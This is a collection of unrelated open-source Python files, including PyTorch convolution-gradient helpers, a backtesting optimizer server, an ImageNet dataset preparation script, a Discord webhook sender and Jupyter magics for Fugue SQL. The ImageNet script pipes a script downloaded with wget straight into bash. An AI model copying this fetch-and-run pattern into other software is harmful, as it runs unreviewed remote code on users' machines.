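# dense -> dropout -> sigmoid), sized by the module-level constants (maxlen=400,
# max_features=20000, embedding_dims=300).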
if __name__ == "__main__":
args, _ = parse_args()
x_train, y_train = get_train_data(args.train)
x_test, y_test = get_test_data(args.test)
model = get_model()
model.compile(loss='binary_crossentropy',
optimizer='adam',
metrics=['accuracy'])
model.fit(x_train, y_train,
batch_size=args.batch_size,
epochs=args.epochs,
validation_data=(x_test, y_test))
# create a TensorFlow SavedModel for deployment to a SageMaker endpoint with TensorFlow Serving
tf.contrib.saved_model.save_keras_model(model, args.model_dir)
|
torch/nn/grad.py | Hacky-DH/pytorch | 60,067 | 12748595 | <reponame>Hacky-DH/pytorch<filename>torch/nn/grad.py
"""Gradient interface"""
import torch
from .modules.utils import _single, _pair, _triple
import warnings
def _grad_input_padding(grad_output, input_size, stride, padding, kernel_size, dilation=None):
if dilation is None:
# For backward compatibility
warnings.warn("_grad_input_padding 'dilation' argument not provided. Default of 1 is used.")
dilation = [1] * len(stride)
input_size = list(input_size)
k = grad_output.dim() - 2
if len(input_size) == k + 2:
input_size = input_size[-k:]
if len(input_size) != k:
raise ValueError("input_size must have {} elements (got {})"
.format(k + 2, len(input_size)))
def dim_size(d):
return ((grad_output.size(d + 2) - 1) * stride[d] - 2 * padding[d] + 1
+ dilation[d] * (kernel_size[d] - 1))
min_sizes = [dim_size(d) for d in range(k)]
max_sizes = [min_sizes[d] + stride[d] - 1 for d in range(k)]
for size, min_size, max_size in zip(input_size, min_sizes, max_sizes):
if size < min_size or size > max_size:
raise ValueError(
("requested an input grad size of {}, but valid sizes range "
"from {} to {} (for a grad_output of {})").format(
input_size, min_sizes, max_sizes,
grad_output.size()[2:]))
return tuple(input_size[d] - min_sizes[d] for d in range(k))
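# Worked example for the helper above (the numbers follow directly from dim_size()):
# with stride=2, padding=0, kernel_size=3, dilation=1 and a grad_output of length 2,
# dim_size = (2 - 1) * 2 - 0 + 1 + 1 * (3 - 1) = 5, so any requested input length in
# [5, 6] is accepted and the returned output padding is input_size - 5 (0 or 1).
# This resolves the usual output-size ambiguity of transposed convolutions.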
def conv1d_input(input_size, weight, grad_output, stride=1, padding=0, dilation=1, groups=1):
r"""
Computes the gradient of conv1d with respect to the input of the convolution.
    This is the same as the 1D transposed convolution operator under the hood but requires
the shape of the gradient w.r.t. input to be specified explicitly.
Args:
input_size : Shape of the input gradient tensor
weight: weight tensor (out_channels x in_channels/groups x kW)
grad_output : output gradient tensor (minibatch x out_channels x oW)
stride (int or tuple, optional): Stride of the convolution. Default: 1
padding (int or tuple, optional): Zero-padding added to both sides of the input. Default: 0
dilation (int or tuple, optional): Spacing between kernel elements. Default: 1
groups (int, optional): Number of blocked connections from input channels to output channels. Default: 1
Examples::
>>> input = torch.randn(1,1,3, requires_grad=True)
>>> weight = torch.randn(1,1,1, requires_grad=True)
>>> output = F.conv1d(input, weight)
>>> grad_output = torch.randn(output.shape)
>>> grad_input = torch.autograd.grad(output, input, grad_output)
>>> F.grad.conv1d_input(input.shape, weight, grad_output)
"""
stride = _single(stride)
padding = _single(padding)
dilation = _single(dilation)
kernel_size = [weight.shape[2]]
if input_size is None:
raise ValueError("grad.conv1d_input requires specifying an input_size")
grad_input_padding = _grad_input_padding(grad_output, input_size, stride,
padding, kernel_size, dilation)
return torch.conv_transpose1d(
grad_output, weight, None, stride, padding, grad_input_padding, groups,
dilation)
def conv1d_weight(input, weight_size, grad_output, stride=1, padding=0, dilation=1, groups=1):
r"""
Computes the gradient of conv1d with respect to the weight of the convolution.
Args:
input: input tensor of shape (minibatch x in_channels x iW)
weight_size : Shape of the weight gradient tensor
grad_output : output gradient tensor (minibatch x out_channels x oW)
stride (int or tuple, optional): Stride of the convolution. Default: 1
padding (int or tuple, optional): Zero-padding added to both sides of the input. Default: 0
dilation (int or tuple, optional): Spacing between kernel elements. Default: 1
groups (int, optional): Number of blocked connections from input channels to output channels. Default: 1
Examples::
>>> input = torch.randn(1,1,3, requires_grad=True)
>>> weight = torch.randn(1,1,1, requires_grad=True)
>>> output = F.conv1d(input, weight)
>>> grad_output = torch.randn(output.shape)
        >>> grad_weight = torch.autograd.grad(output, weight, grad_output)
>>> F.grad.conv1d_weight(input, weight.shape, grad_output)
"""
stride = _single(stride)
padding = _single(padding)
dilation = _single(dilation)
in_channels = input.shape[1]
out_channels = grad_output.shape[1]
min_batch = input.shape[0]
grad_output = grad_output.contiguous().repeat(1, in_channels // groups, 1)
grad_output = grad_output.contiguous().view(
grad_output.shape[0] * grad_output.shape[1], 1, grad_output.shape[2])
input = input.contiguous().view(1, input.shape[0] * input.shape[1],
input.shape[2])
grad_weight = torch.conv1d(input, grad_output, None, dilation, padding,
stride, in_channels * min_batch)
grad_weight = grad_weight.contiguous().view(
min_batch, grad_weight.shape[1] // min_batch, grad_weight.shape[2])
return grad_weight.sum(dim=0).view(
in_channels // groups, out_channels, grad_weight.shape[2]).transpose(
0, 1).narrow(2, 0, weight_size[2])
def conv2d_input(input_size, weight, grad_output, stride=1, padding=0, dilation=1, groups=1):
r"""
Computes the gradient of conv2d with respect to the input of the convolution.
    This is the same as the 2D transposed convolution operator under the hood but requires
the shape of the gradient w.r.t. input to be specified explicitly.
Args:
input_size : Shape of the input gradient tensor
weight: weight tensor (out_channels x in_channels/groups x kH x kW)
grad_output : output gradient tensor (minibatch x out_channels x oH x oW)
stride (int or tuple, optional): Stride of the convolution. Default: 1
padding (int or tuple, optional): Zero-padding added to both sides of the input. Default: 0
dilation (int or tuple, optional): Spacing between kernel elements. Default: 1
groups (int, optional): Number of blocked connections from input channels to output channels. Default: 1
Examples::
>>> input = torch.randn(1,1,3,3, requires_grad=True)
>>> weight = torch.randn(1,1,1,2, requires_grad=True)
>>> output = F.conv2d(input, weight)
>>> grad_output = torch.randn(output.shape)
>>> grad_input = torch.autograd.grad(output, input, grad_output)
>>> F.grad.conv2d_input(input.shape, weight, grad_output)
"""
stride = _pair(stride)
padding = _pair(padding)
dilation = _pair(dilation)
kernel_size = (weight.shape[2], weight.shape[3])
if input_size is None:
raise ValueError("grad.conv2d_input requires specifying an input_size")
grad_input_padding = _grad_input_padding(grad_output, input_size, stride,
padding, kernel_size, dilation)
return torch.conv_transpose2d(
grad_output, weight, None, stride, padding, grad_input_padding, groups,
dilation)
def conv2d_weight(input, weight_size, grad_output, stride=1, padding=0, dilation=1, groups=1):
r"""
Computes the gradient of conv2d with respect to the weight of the convolution.
Args:
input: input tensor of shape (minibatch x in_channels x iH x iW)
weight_size : Shape of the weight gradient tensor
grad_output : output gradient tensor (minibatch x out_channels x oH x oW)
stride (int or tuple, optional): Stride of the convolution. Default: 1
padding (int or tuple, optional): Zero-padding added to both sides of the input. Default: 0
dilation (int or tuple, optional): Spacing between kernel elements. Default: 1
groups (int, optional): Number of blocked connections from input channels to output channels. Default: 1
Examples::
>>> input = torch.randn(1,1,3,3, requires_grad=True)
>>> weight = torch.randn(1,1,1,2, requires_grad=True)
>>> output = F.conv2d(input, weight)
>>> grad_output = torch.randn(output.shape)
        >>> grad_weight = torch.autograd.grad(output, weight, grad_output)
>>> F.grad.conv2d_weight(input, weight.shape, grad_output)
"""
stride = _pair(stride)
padding = _pair(padding)
dilation = _pair(dilation)
in_channels = input.shape[1]
out_channels = grad_output.shape[1]
min_batch = input.shape[0]
grad_output = grad_output.contiguous().repeat(1, in_channels // groups, 1,
1)
grad_output = grad_output.contiguous().view(
grad_output.shape[0] * grad_output.shape[1], 1, grad_output.shape[2],
grad_output.shape[3])
input = input.contiguous().view(1, input.shape[0] * input.shape[1],
input.shape[2], input.shape[3])
grad_weight = torch.conv2d(input, grad_output, None, dilation, padding,
stride, in_channels * min_batch)
grad_weight = grad_weight.contiguous().view(
min_batch, grad_weight.shape[1] // min_batch, grad_weight.shape[2],
grad_weight.shape[3])
return grad_weight.sum(dim=0).view(
in_channels // groups, out_channels,
grad_weight.shape[2], grad_weight.shape[3]).transpose(0, 1).narrow(
2, 0, weight_size[2]).narrow(3, 0, weight_size[3])
def conv3d_input(input_size, weight, grad_output, stride=1, padding=0, dilation=1, groups=1):
r"""
Computes the gradient of conv3d with respect to the input of the convolution.
    This is the same as the 3D transposed convolution operator under the hood but requires
the shape of the gradient w.r.t. input to be specified explicitly.
Args:
input_size : Shape of the input gradient tensor
weight: weights tensor (out_channels x in_channels/groups x kT x kH x kW)
grad_output : output gradient tensor (minibatch x out_channels x oT x oH x oW)
stride (int or tuple, optional): Stride of the convolution. Default: 1
padding (int or tuple, optional): Zero-padding added to both sides of the input. Default: 0
dilation (int or tuple, optional): Spacing between kernel elements. Default: 1
groups (int, optional): Number of blocked connections from input channels to output channels. Default: 1
Examples::
>>> input = torch.randn(2, 8, 10, 10, 20, requires_grad=True)
>>> weight = torch.randn(4, 8, 2, 3, 3, requires_grad=True)
>>> output = F.conv3d(input, weight)
>>> grad_output = torch.randn(output.shape)
>>> grad_input = torch.autograd.grad(output, input, grad_output)
>>> F.grad.conv3d_input(input.shape, weight, grad_output)
"""
stride = _triple(stride)
padding = _triple(padding)
dilation = _triple(dilation)
kernel_size = (weight.shape[2], weight.shape[3], weight.shape[4])
if input_size is None:
raise ValueError("grad.conv3d_input requires specifying an input_size")
grad_input_padding = _grad_input_padding(grad_output, input_size, stride,
padding, kernel_size, dilation)
return torch.conv_transpose3d(
grad_output, weight, None, stride, padding, grad_input_padding, groups,
dilation)
def conv3d_weight(input, weight_size, grad_output, stride=1, padding=0, dilation=1, groups=1):
r"""
Computes the gradient of conv3d with respect to the weight of the convolution.
Args:
input: input tensor of shape (minibatch x in_channels x iT x iH x iW)
weight_size : Shape of the weight gradient tensor
grad_output : output gradient tensor (minibatch x out_channels x oT x oH x oW)
stride (int or tuple, optional): Stride of the convolution. Default: 1
padding (int or tuple, optional): Zero-padding added to both sides of the input. Default: 0
dilation (int or tuple, optional): Spacing between kernel elements. Default: 1
groups (int, optional): Number of blocked connections from input channels to output channels. Default: 1
Examples::
>>> input = torch.randn(2, 8, 10, 10, 20, requires_grad=True)
>>> weight = torch.randn(4, 8, 2, 3, 3, requires_grad=True)
>>> output = F.conv3d(input, weight)
>>> grad_output = torch.randn(output.shape)
>>> grad_weight = torch.autograd.grad(output, weight, grad_output)
>>> F.grad.conv3d_weight(input, weight.shape, grad_output)
"""
stride = _triple(stride)
padding = _triple(padding)
dilation = _triple(dilation)
in_channels = input.shape[1]
out_channels = grad_output.shape[1]
min_batch = input.shape[0]
grad_output = grad_output.repeat(1, in_channels // groups, 1, 1, 1)
grad_output = grad_output.contiguous().view(
grad_output.shape[0] * grad_output.shape[1], 1, grad_output.shape[2],
grad_output.shape[3], grad_output.shape[4])
input = input.contiguous().view(1, input.shape[0] * input.shape[1],
input.shape[2], input.shape[3],
input.shape[4])
grad_weight = torch.conv3d(input, grad_output, None, dilation, padding,
stride, in_channels * min_batch)
grad_weight = grad_weight.contiguous().view(
min_batch, grad_weight.shape[1] // min_batch, grad_weight.shape[2],
grad_weight.shape[3], grad_weight.shape[4])
return grad_weight.sum(dim=0).view(
in_channels // groups, out_channels, grad_weight.shape[2],
grad_weight.shape[3], grad_weight.shape[4]).transpose(0, 1).narrow(
2, 0, weight_size[2]).narrow(3, 0, weight_size[3]).narrow(
4, 0, weight_size[4])
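# The helpers above recompute convolution backward passes explicitly. Below is a
# minimal, hedged verification sketch (not part of the original module): it
# compares conv2d_input/conv2d_weight against torch.autograd.grad on small random
# tensors, assuming default stride/padding/dilation and groups=1.
if __name__ == "__main__":
    import torch.nn.functional as F
    inp = torch.randn(1, 2, 5, 5, requires_grad=True)
    w = torch.randn(3, 2, 3, 3, requires_grad=True)
    out = F.conv2d(inp, w)
    g_out = torch.randn(out.shape)
    # Reference gradients from autograd.
    g_in_ref, g_w_ref = torch.autograd.grad(out, (inp, w), g_out)
    # Gradients from the explicit helpers defined above.
    g_in = conv2d_input(inp.shape, w, g_out)
    g_w = conv2d_weight(inp, w.shape, g_out)
    print(torch.allclose(g_in, g_in_ref, atol=1e-5),
          torch.allclose(g_w, g_w_ref, atol=1e-5))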
|
pyalgotrade/optimizer/server.py | cdyfng/pyalgotrade | 1,000 | 12748617 | # PyAlgoTrade
#
# Copyright 2011-2015 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. moduleauthor:: <NAME> <<EMAIL>>
"""
import pyalgotrade.logger
from pyalgotrade.optimizer import base
from pyalgotrade.optimizer import xmlrpcserver
logger = pyalgotrade.logger.getLogger(__name__)
class Results(object):
"""The results of the strategy executions."""
def __init__(self, parameters, result):
self.__parameters = parameters
self.__result = result
def getParameters(self):
"""Returns a sequence of parameter values."""
return self.__parameters
def getResult(self):
"""Returns the result for a given set of parameters."""
return self.__result
def serve(barFeed, strategyParameters, address, port):
"""Executes a server that will provide bars and strategy parameters for workers to use.
:param barFeed: The bar feed that each worker will use to backtest the strategy.
:type barFeed: :class:`pyalgotrade.barfeed.BarFeed`.
:param strategyParameters: The set of parameters to use for backtesting. An iterable object where **each element is a tuple that holds parameter values**.
:param address: The address to listen for incoming worker connections.
:type address: string.
:param port: The port to listen for incoming worker connections.
:type port: int.
:rtype: A :class:`Results` instance with the best results found or None if no results were obtained.
"""
paramSource = base.ParameterSource(strategyParameters)
resultSinc = base.ResultSinc()
s = xmlrpcserver.Server(paramSource, resultSinc, barFeed, address, port)
logger.info("Starting server")
s.serve()
logger.info("Server finished")
ret = None
bestResult, bestParameters = resultSinc.getBest()
if bestResult is not None:
logger.info("Best final result %s with parameters %s" % (bestResult, bestParameters.args))
ret = Results(bestParameters.args, bestResult)
else:
logger.error("No results. All jobs failed or no jobs were processed.")
return ret
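# A minimal usage sketch (not part of the original module). It assumes a local
# Yahoo-format CSV file ("orcl-2000.csv") and workers that will connect on port
# 5000; the instrument name and parameter grid are illustrative only.
if __name__ == "__main__":
    import itertools
    from pyalgotrade.barfeed import yahoofeed

    # Each element of the iterable is a tuple of strategy parameter values.
    parameters = itertools.product(range(10, 20), range(20, 30))

    feed = yahoofeed.Feed()
    feed.addBarsFromCSV("orcl", "orcl-2000.csv")  # hypothetical data file

    best = serve(feed, parameters, "localhost", 5000)
    if best is not None:
        print("Best result %s with parameters %s" % (best.getResult(), best.getParameters()))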
|
build_files/buildbot/codesign/config_server_template.py | intrigus/blender-1 | 116 | 12748625 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# <pep8 compliant>
# Configuration of a code signer which is specific to the code signing server.
#
# NOTE: DO NOT put any sensitive information here, put it in an actual
# configuration on the signing machine.
from pathlib import Path
from codesign.config_common import *
# URL to the timestamping authority.
TIMESTAMP_AUTHORITY_URL = 'http://timestamp.digicert.com'
# Full path to the certificate used for signing.
#
# The path and expected file format might vary depending on a platform.
#
# On Windows it is usually a PKCS #12 key (.pfx), so the path will look
# like Path('C:\\Secret\\Blender.pfx').
CERTIFICATE_FILEPATH: Path
# https://docs.python.org/3/library/logging.config.html#configuration-dictionary-schema
LOGGING = {
'version': 1,
'formatters': {
'default': {'format': '%(asctime)-15s %(levelname)8s %(name)s %(message)s'}
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'default',
'stream': 'ext://sys.stderr',
}
},
'loggers': {
'codesign': {'level': 'INFO'},
},
'root': {
'level': 'WARNING',
'handlers': [
'console',
],
}
}
|
finalists/yc14600/PyTorch-Encoding/scripts/prepare_imagenet.py | lrzpellegrini/cvpr_clvision_challenge | 2,190 | 12748635 | """Prepare the ImageNet dataset"""
import os
import argparse
import tarfile
import pickle
import gzip
import subprocess
from tqdm import tqdm
from encoding.utils import check_sha1, download, mkdir
_TARGET_DIR = os.path.expanduser('~/.encoding/data/ILSVRC2012')
_TRAIN_TAR = 'ILSVRC2012_img_train.tar'
_TRAIN_TAR_SHA1 = '43eda4fe35c1705d6606a6a7a633bc965d194284'
_VAL_TAR = 'ILSVRC2012_img_val.tar'
_VAL_TAR_SHA1 = '5f3f73da3395154b60528b2b2a2caf2374f5f178'
def parse_args():
parser = argparse.ArgumentParser(
description='Setup the ImageNet dataset.',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--download-dir', required=True,
help="The directory that contains downloaded tar files")
parser.add_argument('--target-dir', default=_TARGET_DIR,
help="The directory to store extracted images")
parser.add_argument('--checksum', action='store_true',
help="If check integrity before extracting.")
parser.add_argument('--with-rec', action='store_true',
help="If build image record files.")
parser.add_argument('--num-thread', type=int, default=1,
help="Number of threads to use when building image record file.")
args = parser.parse_args()
return args
def check_file(filename, checksum, sha1):
if not os.path.exists(filename):
raise ValueError('File not found: '+filename)
if checksum and not check_sha1(filename, sha1):
raise ValueError('Corrupted file: '+filename)
def extract_train(tar_fname, target_dir, with_rec=False, num_thread=1):
mkdir(target_dir)
with tarfile.open(tar_fname) as tar:
print("Extracting "+tar_fname+"...")
# extract each class one-by-one
pbar = tqdm(total=len(tar.getnames()))
for class_tar in tar:
pbar.set_description('Extract '+class_tar.name)
tar.extract(class_tar, target_dir)
class_fname = os.path.join(target_dir, class_tar.name)
class_dir = os.path.splitext(class_fname)[0]
os.mkdir(class_dir)
with tarfile.open(class_fname) as f:
f.extractall(class_dir)
os.remove(class_fname)
pbar.update(1)
pbar.close()
def extract_val(tar_fname, target_dir, with_rec=False, num_thread=1):
mkdir(target_dir)
print('Extracting ' + tar_fname)
with tarfile.open(tar_fname) as tar:
tar.extractall(target_dir)
# build rec file before images are moved into subfolders
# move images to proper subfolders
subprocess.call(["wget -qO- https://raw.githubusercontent.com/soumith/imagenetloader.torch/master/valprep.sh | bash"],
cwd=target_dir, shell=True)
def main():
args = parse_args()
target_dir = os.path.expanduser(args.target_dir)
#if os.path.exists(target_dir):
# raise ValueError('Target dir ['+target_dir+'] exists. Remove it first')
download_dir = os.path.expanduser(args.download_dir)
train_tar_fname = os.path.join(download_dir, _TRAIN_TAR)
check_file(train_tar_fname, args.checksum, _TRAIN_TAR_SHA1)
val_tar_fname = os.path.join(download_dir, _VAL_TAR)
check_file(val_tar_fname, args.checksum, _VAL_TAR_SHA1)
build_rec = args.with_rec
if build_rec:
os.makedirs(os.path.join(target_dir, 'rec'))
extract_train(train_tar_fname, os.path.join(target_dir, 'train'), build_rec, args.num_thread)
extract_val(val_tar_fname, os.path.join(target_dir, 'val'), build_rec, args.num_thread)
if __name__ == '__main__':
main()
|
tests/test_provider_vmware_vmc.py | mjuenema/python-terrascript | 507 | 12748637 | # tests/test_provider_vmware_vmc.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:30:35 UTC)
def test_provider_import():
import terrascript.provider.vmware.vmc
def test_resource_import():
from terrascript.resource.vmware.vmc import vmc_cluster
from terrascript.resource.vmware.vmc import vmc_public_ip
from terrascript.resource.vmware.vmc import vmc_sddc
from terrascript.resource.vmware.vmc import vmc_site_recovery
from terrascript.resource.vmware.vmc import vmc_srm_node
def test_datasource_import():
from terrascript.data.vmware.vmc import vmc_connected_accounts
from terrascript.data.vmware.vmc import vmc_customer_subnets
from terrascript.data.vmware.vmc import vmc_org
from terrascript.data.vmware.vmc import vmc_sddc
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.vmware.vmc
#
# t = terrascript.provider.vmware.vmc.vmc()
# s = str(t)
#
# assert 'https://github.com/vmware/terraform-provider-vmc' in s
# assert '1.7.0' in s
|
sqlite_table_check.py | nicetone/Python | 28,321 | 12748653 | <reponame>nicetone/Python
# Script Name : sqlite_table_check.py
# Author : <NAME>
# Created : 07 June 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Checks the main SQLITE database to ensure all the expected tables exist
import os
import sqlite3
dropbox = os.getenv("dropbox")
config = os.getenv("my_config")
dbfile = ("Databases\jarvis.db")
listfile = ("sqlite_master_table.lst")
master_db = os.path.join(dropbox, dbfile)
config_file = os.path.join(config, listfile)
tablelist = open(config_file, 'r')
conn = sqlite3.connect(master_db)
cursor = conn.cursor()
cursor.execute('SELECT SQLITE_VERSION()')
data = cursor.fetchone()
if data is not None and data[0] == "3.6.21":
print("\nCurrently " + master_db + " is on SQLite version: %s" % data + " - OK -\n")
else:
print("\nDB On different version than master version - !!!!! \n")
conn.close()
print("\nCheckling " + master_db + " against " + config_file + "\n")
for table in tablelist.readlines():
conn = sqlite3.connect(master_db)
cursor = conn.cursor()
cursor.execute("select count(*) from sqlite_master where name = ?", (table.strip(),))
res = cursor.fetchone()
if (res[0]):
print('[+] Table : ' + table.strip() + ' exists [+]')
else:
print('[-] Table : ' + table.strip() + ' does not exist [-]')
|
 Src/StdLib/Lib/whichdb.py | cwensley/ironpython2 | 6,989 | 12748662 | #!/usr/bin/env python
"""Guess which db package to use to open a db file."""
import os
import struct
import sys
try:
import dbm
_dbmerror = dbm.error
except ImportError:
dbm = None
# just some sort of valid exception which might be raised in the
# dbm test
_dbmerror = IOError
def whichdb(filename):
"""Guess which db package to use to open a db file.
Return values:
- None if the database file can't be read;
- empty string if the file can be read but can't be recognized
- the module name (e.g. "dbm" or "gdbm") if recognized.
Importing the given module may still fail, and opening the
database using that module may still fail.
"""
# Check for dbm first -- this has a .pag and a .dir file
try:
f = open(filename + os.extsep + "pag", "rb")
f.close()
# dbm linked with gdbm on OS/2 doesn't have .dir file
if not (dbm.library == "GNU gdbm" and sys.platform == "os2emx"):
f = open(filename + os.extsep + "dir", "rb")
f.close()
return "dbm"
except IOError:
# some dbm emulations based on Berkeley DB generate a .db file
# some do not, but they should be caught by the dbhash checks
try:
f = open(filename + os.extsep + "db", "rb")
f.close()
# guarantee we can actually open the file using dbm
# kind of overkill, but since we are dealing with emulations
# it seems like a prudent step
if dbm is not None:
d = dbm.open(filename)
d.close()
return "dbm"
except (IOError, _dbmerror):
pass
# Check for dumbdbm next -- this has a .dir and a .dat file
try:
# First check for presence of files
os.stat(filename + os.extsep + "dat")
size = os.stat(filename + os.extsep + "dir").st_size
# dumbdbm files with no keys are empty
if size == 0:
return "dumbdbm"
f = open(filename + os.extsep + "dir", "rb")
try:
if f.read(1) in ("'", '"'):
return "dumbdbm"
finally:
f.close()
except (OSError, IOError):
pass
# See if the file exists, return None if not
try:
f = open(filename, "rb")
except IOError:
return None
# Read the start of the file -- the magic number
s16 = f.read(16)
f.close()
s = s16[0:4]
# Return "" if not at least 4 bytes
if len(s) != 4:
return ""
# Convert to 4-byte int in native byte order -- return "" if impossible
try:
(magic,) = struct.unpack("=l", s)
except struct.error:
return ""
# Check for GNU dbm
if magic in (0x13579ace, 0x13579acd, 0x13579acf):
return "gdbm"
# Check for old Berkeley db hash file format v2
if magic in (0x00061561, 0x61150600):
return "bsddb185"
# Later versions of Berkeley db hash file have a 12-byte pad in
# front of the file type
try:
(magic,) = struct.unpack("=l", s16[-4:])
except struct.error:
return ""
# Check for BSD hash
if magic in (0x00061561, 0x61150600):
return "dbhash"
# Unknown
return ""
if __name__ == "__main__":
for filename in sys.argv[1:]:
print whichdb(filename) or "UNKNOWN", filename
|
discord_embedded_message/message.py | sonalimahajan12/Automation-scripts | 496 | 12748674 | import datetime
import json
import requests
def send_message(
webhook_url: str,
content_msg="",
title="",
title_url="",
color=00000000,
timestamp=datetime.datetime.now().isoformat(),
footer_icon="",
footer="",
thumbnail_url="",
author="",
author_url="",
author_icon_url="",
text_name="",
text="",
):
payload = {
"content": content_msg,
"embeds": [
{
"title": title,
"url": title_url,
"color": color,
"timestamp": timestamp,
"footer": {
"icon_url": footer_icon,
"text": footer,
},
"thumbnail": {"url": thumbnail_url},
"author": {
"name": author,
"url": author_url,
"icon_url": author_icon_url,
},
"fields": [
{
"name": text_name,
"value": text,
}
],
}
],
}
print(">> Sending To WebHook...")
payload = json.dumps(payload)
headers = {"Content-Type": "application/json"}
response = requests.post(webhook_url, headers=headers, data=payload)
return response
def example_calling():
webhook_url = "your_webhook_url"
response = send_message(
webhook_url,
content_msg="Some random text",
title="Discord Embed example",
title_url="https://discordjs.guide/popular-topics/embeds.html#embed-preview",
color=15335679,
footer_icon="https://github.githubassets.com/favicons/favicon-dark.png",
footer="May the Force be with you",
thumbnail_url="https://avatars.githubusercontent.com/u/55619686",
author="OjusWiZard",
author_url="https://github.com/OjusWiZard/",
author_icon_url="https://avatars.githubusercontent.com/u/55619686",
text_name=":point_down: :point_down: :point_down:",
text="This is a test message",
)
print("Status: ", response.status_code)
if __name__ == "__main__":
example_calling()
|
fugue_notebook/env.py | fugue-project/fugue | 547 | 12748697 | <reponame>fugue-project/fugue
# pylint: disable=W0611,W0613
import html
import json
from typing import Any, Callable, Dict, List
import fugue_sql
import pandas as pd
from fugue import (
ExecutionEngine,
NativeExecutionEngine,
make_execution_engine,
register_execution_engine,
)
from fugue.dataframe import YieldedDataFrame
from fugue.extensions._builtins.outputters import Show
from IPython.core.magic import Magics, cell_magic, magics_class, needs_local_scope
from IPython.display import HTML, display
from triad import ParamDict, Schema
from triad.utils.convert import to_instance
class NotebookSetup(object):
"""Jupyter notebook environment customization template."""
def get_pre_conf(self) -> Dict[str, Any]:
"""The default config for all registered execution engine"""
return {}
def get_post_conf(self) -> Dict[str, Any]:
"""The enforced config for all registered execution engine.
Users should not set these configs manually, if they set, the values
must match this dict, otherwise, exceptions will be thrown
"""
return {}
def get_pretty_print(self) -> Callable:
"""Fugue dataframe pretty print handler"""
return _default_pretty_print
def register_execution_engines(self):
"""Register execution engines with names. This will also try to register
spark and dask engines if the dependent packages are available and they
are not registered"""
register_execution_engine(
"native",
lambda conf, **kwargs: NativeExecutionEngine(conf=conf),
on_dup="ignore",
)
try:
import pyspark # noqa: F401
import fugue_spark # noqa: F401
except ImportError:
pass
try:
import dask.dataframe # noqa: F401
import fugue_dask # noqa: F401
except ImportError:
pass
@magics_class
class _FugueSQLMagics(Magics):
"""Fugue SQL Magics"""
def __init__(
self,
shell: Any,
pre_conf: Dict[str, Any],
post_conf: Dict[str, Any],
fsql_ignore_case: bool = False,
):
# You must call the parent constructor
super().__init__(shell)
self._pre_conf = pre_conf
self._post_conf = post_conf
self._fsql_ignore_case = fsql_ignore_case
@needs_local_scope
@cell_magic("fsql")
def fsql(self, line: str, cell: str, local_ns: Any = None) -> None:
dag = fugue_sql.fsql(cell, local_ns, fsql_ignore_case=self._fsql_ignore_case)
dag.run(self.get_engine(line, {} if local_ns is None else local_ns))
for k, v in dag.yields.items():
if isinstance(v, YieldedDataFrame):
local_ns[k] = v.result # type: ignore
else:
local_ns[k] = v # type: ignore
def get_engine(self, line: str, lc: Dict[str, Any]) -> ExecutionEngine:
line = line.strip()
p = line.find("{")
if p >= 0:
engine = line[:p].strip()
conf = json.loads(line[p:])
else:
parts = line.split(" ", 1)
engine = parts[0]
conf = ParamDict(None if len(parts) == 1 else lc[parts[1]])
cf = dict(self._pre_conf)
cf.update(conf)
for k, v in self._post_conf.items():
if k in cf and cf[k] != v:
raise ValueError(
f"{k} must be {v}, but you set to {cf[k]}, you may unset it"
)
cf[k] = v
if "+" in engine:
return make_execution_engine(tuple(engine.split("+", 1)), cf)
return make_execution_engine(engine, cf)
def _default_pretty_print(
schema: Schema,
head_rows: List[List[Any]],
title: Any,
rows: int,
count: int,
):
components: List[Any] = []
if title is not None:
components.append(HTML(f"<h3>{html.escape(title)}</h3>"))
pdf = pd.DataFrame(head_rows, columns=list(schema.names))
components.append(pdf)
if count >= 0:
components.append(HTML(f"<strong>total count: {count}</strong>"))
components.append(HTML(f"<small>schema: {schema}</small>"))
display(*components)
def _setup_fugue_notebook(
ipython: Any, setup_obj: Any, fsql_ignore_case: bool = False
) -> None:
s = NotebookSetup() if setup_obj is None else to_instance(setup_obj, NotebookSetup)
magics = _FugueSQLMagics(
ipython,
dict(s.get_pre_conf()),
dict(s.get_post_conf()),
fsql_ignore_case=fsql_ignore_case,
)
ipython.register_magics(magics)
s.register_execution_engines()
Show.set_hook(s.get_pretty_print())
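# A minimal usage sketch (not part of the original module); it assumes it runs
# inside an IPython/Jupyter session. "my.conf.key" is a hypothetical config entry
# used only to illustrate get_pre_conf(); real deployments would normally go
# through the package's public entry point instead of calling
# _setup_fugue_notebook directly.
if __name__ == "__main__":
    from IPython import get_ipython

    class _ExampleSetup(NotebookSetup):
        def get_pre_conf(self):
            # Default config applied to every engine created by %%fsql.
            return {"my.conf.key": "value"}  # hypothetical key

    ip = get_ipython()
    if ip is not None:
        _setup_fugue_notebook(ip, _ExampleSetup(), fsql_ignore_case=True)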
|
slybot/slybot/starturls/generator.py | hackrush01/portia | 6,390 | 12748703 | <reponame>hackrush01/portia
from collections import OrderedDict
from datetime import datetime
from itertools import chain, product
from scrapy.utils.spider import arg_to_iter
import six
try:
from itertools import izip_longest
except ImportError:
from itertools import zip_longest as izip_longest
from six.moves.urllib.parse import urlencode
class IdentityGenerator():
def __call__(self, spec):
return spec
class UrlGenerator(object):
def __init__(self, settings=None, spider_args=None):
self._processors = {
'date': self._process_date,
'default': self._process_default,
'options': self._process_option,
